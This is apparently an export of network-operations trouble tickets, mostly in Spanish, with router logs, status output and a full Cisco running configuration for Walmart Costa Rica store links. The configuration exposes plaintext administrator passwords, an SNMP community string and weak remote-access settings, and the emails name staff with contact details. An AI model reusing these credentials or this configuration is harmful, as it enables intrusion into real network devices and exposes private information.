JUN 19 2022 20:20:46-06:00 CC_WALMART_CR_TIENDA_3107 %%01BGP/3/STATE_CHG_UPDOWN(L)[11]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN 19 2022 20:20:45-06:00 CC_WALMART_CR_TIENDA_3107 %%01BGP/3/STATE_CHG_UPDOWN(L)[12]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN 19 2022 20:20:41-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFNET/4/LINK_STATE(L)[13]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE UP STATE.
JUN 19 2022 20:20:41-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFNET/4/LINK_STATE(L)[14]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE UP STATE.
JUN 19 2022 20:20:41-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFPDT/4/IF_STATE(L)[15]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
JUN 19 2022 20:20:03-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFPDT/4/DRVICOUTSTR(L)[16]:3G/LTE MODULE ON CELLULAR0/0/0 HAS BEEN INITIALIZED SUCCESSFULLY.
JUN 19 2022 20:20:03-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFPDT/4/DRVICOUTSTR(L)[17]:3G/LTE MODULE ON CELLULAR0/0/0 IS INITIALIZING, WAITING PLEASE...
JUN 19 2022 20:19:43-06:00 CC_WALMART_CR_TIENDA_3107 %%01SSLA/3/PKI_GET_CERT_FAIL(L)[18]:PKI FAILS TO OBTAIN CERTIFICATES.(POLICYNAME=DEFAULT_POLICY,POLICYTYPE=1)
JUN 19 2022 20:19:41-06:00 CC_WALMART_CR_TIENDA_3107 %%01DEV/4/ENTUP(L)[19]:AR129CGVW-L BOARD[0] REGISTER SUCCESS.
JUN 19 2022 20:19:39-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFPDT/4/IF_STATE(L)[20]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
JUN 19 2022 20:19:39-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFPDT/4/IF_STATE(L)[21]:INTERFACE GIGABITETHERNET0/0/5 HAS TURNED INTO UP STATE.
JUN 19 2022 20:19:38-06:00 CC_WALMART_CR_TIENDA_3107 %%01IFPDT/4/IF_STATE(L)[22]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
JUN 19 2022 20:19:31-06:00 CC_WALMART_CR_TIENDA_3107 %%01RM/4/ROUTERID_CHANGE(L)[23]:THE ROUTER ID IS 10.201.11.185. (INSTANCEID=0)
JUN 19 2022 20:19:29+00:00 CC_WALMART_CR_TIENDA_3107 %%01IFNET/4/LINK_STATE(L)[24]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK5 HAS ENTERED THE UP STATE.
JUN 19 2022 20:19:23+00:00 CC_WALMART_CR_TIENDA_3107 %%01IFPDT/4/DRVICOUTSTR(L)[25]:3G/LTE MODULE ON CELLULAR0/0/0 IS INSERTED!
JUN 20 2022 02:18:58+00:00 CC_WALMART_CR_TIENDA_3107 %%01GTL/4/STATECHANGED(L)[26]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;CC_WALMART_CR_TIENDA_3107&gt;
DISPLAY CLOCK
2022-06-19 21:59:19
SUNDAY
TIME ZONE(GMT) : UTC-06:00
&lt;CC_WALMART_CR_TIENDA_3107&gt;
TABLA ARP DEL ROUTER CPE:
DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
------------------------------------------------------------------------------
22.32.0.173     60DE-F329-2B35            I -         GE0/0/1
22.32.0.174     70C9-C601-6EC8  14        D-0         GE0/0/1
10.201.11.185   60DE-F329-2B35            I -         GE0/0/0.1107
10.201.11.129   505D-AC64-7F7C  20        D-0         GE0/0/0.1107
                                          1107/-
10.201.41.185   60DE-F329-2B35            I -         GE0/0/0.2107
10.201.41.129   F4DE-AF06-70A8  12        D-0         GE0/0/0.2107
                                          2107/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:3       STATIC:0     INTERFACE:3
&lt;CC_WALMART_CR_TIENDA_3107&gt;
INTERFACES DEL ROUTER:
DISPLAY INT DESC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DOWN     WAN PRINCIPAL/_/CONTR0001541963OC                                               /_/
GE0/0/0.1107                  UP      UP       PRIMARY LINK TO MTR105
GE0/0/0.2107                  UP      UP       REDUNDANCY LINK TO MTR488
GE0/0/1                       UP      UP       LAN DEL CLIENTE
GE0/0/2                       *DOWN   DOWN     LIBRE
GE0/0/3                       *DOWN   DOWN     LIBRE
GE0/0/4                       *DOWN   DOWN     LIBRE
GE0/0/5                       UP      DOWN     LAN DEL CLIENTE
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC                                               E
VLANIF1                       DOWN    DOWN     HUAWEI, AR SERIES, VLANIF1 INTERF                                               ACE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               1 INTERFACE
&lt;CC_WALMART_CR_TIENDA_3107&gt;
DISPLAY  IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 7
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 5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07         10.201.11.185/26     UP         UP
GIGABITETHERNET0/0/0.2107         10.201.41.185/26     UP         UP
GIGABITETHERNET0/0/1              22.32.0.173/30       UP         UP
GIGABITETHERNET0/0/4              UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/5              UNASSIGNED           UP         DOWN
LOOPBACK5                         10.99.77.109/32      UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           UNASSIGNED           DOWN       DOWN
&lt;CC_WALMART_CR_TIENDA_3107&gt;
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.185
  PING 10.201.11.185: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.185 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.36.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_WALMART 10.201.11.185
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.201.11.128/26  DIRECT  0    0             D   10.201.11.129   GIGABITETHERNET4/0/1.1107			</t>
  </si>
  <si>
    <t>F4608143</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE SE ENCUENTRA OPERATIVO SE PROCEDE CON CIERRE DE TTK POR PROBLEMAS DE ENERGIA COMERCIAL EN EL CLIENTE
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 13 SEMANAS.
CISCO IOS XE SOFTWARE, VERSION 16.06.01
CISCO IOS SOFTWARE [EVEREST], ISR SOFTWARE (X86_64_LINUX_IOSD-UNIVERSALK9-M), VERSION 16.6.1, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2017 BY CISCO SYSTEMS, INC.
COMPILED SAT 22-JUL-17 05:55 BY MCPRE
CISCO IOS-XE SOFTWARE, COPYRIGHT (C) 2005-2017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WALMART_CR_TIENDA_4083 UPTIME IS 13 WEEKS, 3 DAYS, 2 HOURS, 48 MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 13 WEEKS, 3 DAYS, 2 HOURS, 51 MINUTES
SYSTEM RETURNED TO ROM BY POWERON
SYSTEM RESTARTED AT 02:52:07 GTM FRI MAR 18 2022
SYSTEM IMAGE FILE IS "BOOTFLASH:ISR4300-UNIVERSALK9.16.06.01.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ADVUCSUITEK9          NONE                  NONE           NONE
UCK9
CME-SRST
CUBE
TECHNOLOGY PACKAGE LICENSE INFORMATION:
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
APPXK9           APPXK9           PERMANENT        APPXK9
UCK9             UCK9             PERMANENT        UCK9
SECURITYK9       NONE             NONE             NONE
IPBASE           IPBASEK9         PERMANENT        IPBASEK9
CISCO ISR4321/K9 (1RU) PROCESSOR WITH 1797107K/6147K BYTES OF MEMORY.
PROCESSOR BOARD ID FLM2145W0B4
2 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
3207167K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
CC_WALMART_CR_TIENDA_4083#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5087 BYTES
!
! LAST CONFIGURATION CHANGE AT 15:18:36 GTM MON MAY 2 2022 BY CLAROCR
! NVRAM CONFIG LAST UPDATED AT 15:18:40 GTM MON MAY 2 2022 BY CLAROCR
!
VERSION 16.6
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_WALMART_CR_TIENDA_4083
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
VRF DEFINITION MGMT-INTF
 !
 ADDRESS-FAMILY IPV4
 EXIT-ADDRESS-FAMILY
 !
 ADDRESS-FAMILY IPV6
 EXIT-ADDRESS-FAMILY
!
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GTM -6 0
!
IP VRF VRF_SEGURIDAD_CORPORATIVA
 RD 330:130
 ROUTE-TARGET EXPORT 330:130
 ROUTE-TARGET IMPORT 330:130
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
!
!
!
!
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
LICENSE UDI PID ISR4321/K9 SN FDO21383318
DIAGNOSTIC BOOTUP LEVEL MINIMAL
SPANNING-TREE EXTEND SYSTEM-ID
!
!
!
USERNAME CLARO PRIVILEGE 15 PASSWORD 0 CLARO
USERNAME CLAROCR PRIVILEGE 15 PASSWORD 0 R3DCL@R0CR
!
REDUNDANCY
 MODE NONE
!
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.77.197 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN_PUNTO_VENTA_CONTR0001582941OC
 BANDWIDTH 3072
 NO IP ADDRESS
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/0.1115
 DESCRIPTION WAN PRINCIPAL/_/CONTR0001582941OC/_/
 BANDWIDTH 3072
 ENCAPSULATION DOT1Q 1115
 IP ADDRESS 10.201.12.146 255.255.255.224
!
INTERFACE GIGABITETHERNET0/0/0.1116
 DESCRIPTION WAN_SEGURIDAD
 ENCAPSULATION DOT1Q 1116
 IP VRF FORWARDING VRF_SEGURIDAD_CORPORATIVA
 IP ADDRESS 10.201.12.166 255.255.255.224
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
!
INTERFACE GIGABITETHERNET0/0/0.2115
 DESCRIPTION WAN_PUNTO_VENTA_HACIA_MTR488
 ENCAPSULATION DOT1Q 2115
 IP ADDRESS 10.201.42.114 255.255.255.224
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.32.1.217 255.255.255.252
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 60
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0
 VRF FORWARDING MGMT-INTF
 IP ADDRESS 172.18.70.1 255.255.255.0
 SHUTDOWN
 NEGOTIATION AUTO
!
ROUTER OSPF 65410
 ROUTER-ID 172.18.70.1
 REDISTRIBUTE CONNECTED SUBNETS
 NETWORK 22.32.1.216 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
!
ROUTER BGP 64521
 BGP LOG-NEIGHBOR-CHANGES
 REDISTRIBUTE CONNECTED
 REDISTRIBUTE OSPF 65410
 NEIGHBOR 10.201.12.129 REMOTE-AS 14754
 NEIGHBOR 10.201.12.129 SEND-COMMUNITY
 NEIGHBOR 10.201.12.129 ALLOWAS-IN
 NEIGHBOR 10.201.12.129 ROUTE-MAP LOCAL_PREFERENCE IN
 NEIGHBOR 10.201.12.129 ROUTE-MAP LOCAL_PREFERENCE OUT
 NEIGHBOR 10.201.42.97 REMOTE-AS 14754
 NEIGHBOR 10.201.42.97 SEND-COMMUNITY
 NEIGHBOR 10.201.42.97 ALLOWAS-IN
!
IP FORWARD-PROTOCOL ND
IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP TFTP SOURCE-INTERFACE GIGABITETHERNET0
!
IP SSH SERVER ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
IP SSH CLIENT ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
!
!
IP PREFIX-LIST CONECTADAS_LAN_WALMART SEQ 5 PERMIT 22.32.3.244/30
!
IP PREFIX-LIST CONECTADAS_WALMART SEQ 5 PERMIT 10.201.12.128/27
IP PREFIX-LIST CONECTADAS_WALMART SEQ 10 PERMIT 10.99.77.197/32
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 88 PERMIT 190.148.130.0 0.0.0.63
!
!
ROUTE-MAP CONECTADAS_WALMART PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONECTADAS_WALMART
!
ROUTE-MAP LOCAL_PREFERENCE PERMIT 10
 SET LOCAL-PREFERENCE 300
!
ROUTE-MAP CONECTADAS_LAN_WALMART PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONECTADAS_LAN_WALMART
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION DE LA ESQUINA NOOESTE DE LA IGLESIA CATOLICA, 200M ESTE Y 100M NORTE
!
!
CONTROL-PLANE
!
!
MGCP BEHAVIOR RSIP-RANGE TGCP-ONLY
MGCP BEHAVIOR COMEDIA-ROLE NONE
MGCP BEHAVIOR COMEDIA-CHECK-MEDIA-SRC DISABLE
MGCP BEHAVIOR COMEDIA-SDP-FORCE DISABLE
!
MGCP PROFILE DEFAULT
!
!
!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AUX 0
 STOPBITS 1
LINE VTY 0 4
 PRIVILEGE LEVEL 15
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
NTP SERVER 10.201.12.129 PREFER
NTP SERVER 10.201.42.97
!
!
!
!
!
END
CC_WALMART_CR_TIENDA_4083#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 92 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 92 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 94 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
JCHANGE: NEIGHBOR 10.201.42.97 IPV4 UNICAST TOPOLOGY BASE REMOVED FROM SESSION  BGP NOTIFICATION SENT
MAR 31 15:08:35.937: %BGP-3-NOTIFICATION: SENT TO NEIGHBOR 10.201.12.129 4/0 (HOLD TIME EXPIRED) 0 BYTES
MAR 31 15:08:35.937: %BGP-5-NBR_RESET: NEIGHBOR 10.201.12.129 RESET (BGP NOTIFICATION SENT)
MAR 31 15:08:35.984: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.12.129 DOWN BGP NOTIFICATION SENT
MAR 31 15:08:35.984: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.201.12.129 IPV4 UNICAST TOPOLOGY BASE REMOVED FROM SESSION  BGP NOTIFICATION SENT
MAR 31 15:10:37.401: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.12.129 UP
MAR 31 15:10:38.516: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.42.97 UP
MAR 31 15:10:57.192: %BGP-5-NBR_RESET: NEIGHBOR 10.201.12.129 PASSIVE RESET (PEER CLOSED THE SESSION)
APR  5 14:22:47.025: %BGP-3-NOTIFICATION: SENT TO NEIGHBOR 10.201.42.97 4/0 (HOLD TIME EXPIRED) 0 BYTES
APR  5 14:22:47.026: %BGP-5-NBR_RESET: NEIGHBOR 10.201.42.97 RESET (BGP NOTIFICATION SENT)
APR  5 14:22:47.047: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.42.97 DOWN BGP NOTIFICATION SENT
APR  5 14:22:47.047: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.201.42.97 IPV4 UNICAST TOPOLOGY BASE REMOVED FROM SESSION  BGP NOTIFICATION SENT
APR  5 14:22:48.050: %BGP-3-NOTIFICATION: SENT TO NEIGHBOR 10.201.12.129 4/0 (HOLD TIME EXPIRED) 0 BYTES
APR  5 14:22:48.050: %BGP-5-NBR_RESET: NEIGHBOR 10.201.12.129 RESET (BGP NOTIFICATION SENT)
APR  5 14:22:48.103: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.12.129 DOWN BGP NOTIFICATION SENT
APR  5 14:22:48.103: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.201.12.129 IPV4 UNICAST TOPOLOGY BASE REMOVED FROM SESSION  BGP NOTIFICATION SENT
APR  5 14:23:36.728: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.12.129 UP
APR  5 14:23:40.824: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.42.97 UP
MAY  2 21:18:36.430: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (190.148.15.202)
MAY  2 21:18:43.618: %SYS-2-PRIVCFG_ENCRYPT: SUCCESSFULLY ENCRYPTED PRIVATE CONFIG FILE
JUN  2 16:00:13.162: %BGP-3-NOTIFICATION: SENT TO NEIGHBOR 10.201.42.97 4/0 (HOLD TIME EXPIRED) 0 BYTES
JUN  2 16:00:13.162: %BGP-5-NBR_RESET: NEIGHBOR 10.201.42.97 RESET (BGP NOTIFICATION SENT)
JUN  2 16:00:13.185: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.42.97 DOWN BGP NOTIFICATION SENT
JUN  2 16:00:13.185: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.201.42.97 IPV4 UNICAST TOPOLOGY BASE REMOVED FROM SESSION  BGP NOTIFICATION SENT
JUN  2 16:00:30.571: %BGP-3-NOTIFICATION: SENT TO NEIGHBOR 10.201.12.129 4/0 (HOLD TIME EXPIRED) 0 BYTES
JUN  2 16:00:30.572: %BGP-5-NBR_RESET: NEIGHBOR 10.201.12.129 RESET (BGP NOTIFICATION SENT)
JUN  2 16:00:30.620: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.12.129 DOWN BGP NOTIFICATION SENT
JUN  2 16:00:30.620: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.201.12.129 IPV4 UNICAST TOPOLOGY BASE REMOVED FROM SESSION  BGP NOTIFICATION SENT
JUN  2 16:06:34.342: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.42.97 UP
JUN  2 16:06:34.626: %BGP-5-NBR_RESET: NEIGHBOR 10.201.42.97 PASSIVE RESET (PEER CLOSED THE SESSION)
JUN  2 16:06:51.089: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.12.129 UP
JUN 20 04:02:05.846: %BGP-3-NOTIFICATION: SENT TO NEIGHBOR 10.201.42.97 4/0 (HOLD TIME EXPIRED) 0 BYTES
JUN 20 04:02:05.847: %BGP-5-NBR_RESET: NEIGHBOR 10.201.42.97 RESET (BGP NOTIFICATION SENT)
JUN 20 04:02:05.869: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.42.97 DOWN BGP NOTIFICATION SENT
JUN 20 04:02:05.869: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.201.42.97 IPV4 UNICAST TOPOLOGY BASE REMOVED FROM SESSION  BGP NOTIFICATION SENT
JUN 20 04:02:28.376: %BGP-3-NOTIFICATION: SENT TO NEIGHBOR 10.201.12.129 4/0 (HOLD TIME EXPIRED) 0 BYTES
JUN 20 04:02:28.376: %BGP-5-NBR_RESET: NEIGHBOR 10.201.12.129 RESET (BGP NOTIFICATION SENT)
JUN 20 04:02:28.425: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.12.129 DOWN BGP NOTIFICATION SENT
JUN 20 04:02:28.425: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.201.12.129 IPV4 UNICAST TOPOLOGY BASE REMOVED FROM SESSION  BGP NOTIFICATION SENT
JUN 20 04:43:33.240: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.12.129 UP
JUN 20 04:43:40.958: %BGP-5-NBR_RESET: NEIGHBOR 10.201.42.97 ACTIVE RESET (BGP NOTIFICATION SENT)
JUN 20 04:43:40.958: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.42.97 UP
CC_WALMART_CR_TIENDA_4083#
SHOW CLOCK
05:40:58.136 GTM MON JUN 20 2022
CC_WALMART_CR_TIENDA_4083#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.201.12.129           4   505D.AC64.7F7C  ARPA   GIGABITETHERNET0/0/0.1115
INTERNET  10.201.12.146           -   EC1D.8B91.DBE0  ARPA   GIGABITETHERNET0/0/0.1115
INTERNET  10.201.42.97            0   F4DE.AF06.70A8  ARPA   GIGABITETHERNET0/0/0.2115
INTERNET  10.201.42.114           -   EC1D.8B91.DBE0  ARPA   GIGABITETHERNET0/0/0.2115
INTERNET  22.32.1.217             -   EC1D.8B91.DBE1  ARPA   GIGABITETHERNET0/0/1
INTERNET  22.32.1.218            27   0024.9780.7C7A  ARPA   GIGABITETHERNET0/0/1
CC_WALMART_CR_TIENDA_4083#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN_PUNTO_VENTA_CONTR0001582941OC
GI0/0/0.1115                   UP             UP       WAN PRINCIPAL/_/CONTR0001582941OC/_/
GI0/0/0.1116                   UP             UP       WAN_SEGURIDAD
GI0/0/0.2115                   UP             UP       WAN_PUNTO_VENTA_HACIA_MTR488
GI0/0/1                        UP             UP       LAN DEL CLIENTE
GI0                            ADMIN DOWN     DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
CC_WALMART_CR_TIENDA_4083#
SHOW IP INT BRIEF
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   UNASSIGNED      YES NVRAM  UP                    UP
GI0/0/0.1115           10.201.12.146   YES NVRAM  UP                    UP
GI0/0/0.1116           10.201.12.166   YES NVRAM  UP                    UP
GI0/0/0.2115           10.201.42.114   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   22.32.1.217     YES NVRAM  UP                    UP
GIGABITETHERNET0       172.18.70.1     YES NVRAM  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5              10.99.77.197    YES NVRAM  UP                    UP
CC_WALMART_CR_TIENDA_4083#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.12.146
  PING 10.201.12.146: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.12.146 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 6/117/244 MS
RUTA IP:
PE: 10.179.36.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_WALMART 10.201.12.146
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.201.12.128/27  DIRECT  0    0             D   10.201.12.129   GIGABITETHERNET4/0/1.1115			</t>
  </si>
  <si>
    <t>SEGUN UFINET NO SE TIENE CONECTIVIDAD CON EL CLIENTE FINAL INDICA QUE ES NECESARIO REALIZAR PRUEBAS DE 1 ER NIVEL PARA DESCARTAR ENERGIA SE PORCEDE A DEJAR EL TTK EN ETAPA PENDIENTE CLIENTE SI LE VANTA ENTRE EL HORARIO DE LA MADRUGADA PARA NO SOLICITAR CONTACTOS EN CLIENTE DEL PUNTO REMOTO
DE: LESTER J. CRUZ LOPEZ &lt;LCRUZL@UFINET.COM&gt;
ENVIADO: DOMINGO, 19 DE JUNIO DE 2022 22:44
PARA: NOC UFINET LATAM &lt;NOCLATAM@UFINET.COM&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; GRUPO SOPORTE N1 LATAM &lt;N1.LATAM@UFINET.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: DOWN CRCRCLA10009972C || TIK-176600-M8P7 ||
ESTIMADO CLIENTE BUEN DÍA,
HEMOS REVISADO SU SERVICIO Y DETECTAMOS EL PUERTO ÓPTICO CAÍDO HACIA LA ÚLTIMA MILLA.
SE REQUIERE QUE REALICEN LOS RESPECTIVOS DESCARTES DE PRIMER NIVEL (ENERGÍA Y CONEXIONES) EN LA SEDE.
SI UNA VEZ REALIZANDO LO ANTERIOR CONTINÚAN CON EL INCONVENIENTE POR FAVOR COMPARTIR LOS SIGUIENTES DATOS EN CASO SE REQUIERA UNA VISITA TÉCNICA.
*CONTACTO LOCAL
*DIRECCIÓN DEL SITIO
*HORARIO DE ATENCIÓN
*REGISTRO FOTOGRÁFICO DEL EQUIPO
QUEDAMOS ATENTOS A SUS COMENTARIOS PARA DAR CONTINUIDAD AL CASO.
SALUDOS CORDIALES / BEST REGARDS,
LESTER JOSUE CRUZ LOPEZ
ENGINEER L1
AVENIDA REFORMA 6-39, CENTRO CORPORATIVO GUAYACÁN, OFICINA 701, C. DE GUATEMALA, GT
T: +502 2317 3300 OR +502 2317 3333
M: +502 4769 6153</t>
  </si>
  <si>
    <t>F4608176</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL  PARA VALIDAR Y SE ADJUNTAN  PRUEBAS --*-*
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 20 DE JUNIO DE 2022 05:22
PARA: ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL IMSCI003101 ::: TICKET CNOC IMSCI003101::: "PERDIDA DE PAQUETES HACIA IPSL 300"
BUENOS DÍAS ESTIMADO SR. ESTRADA.
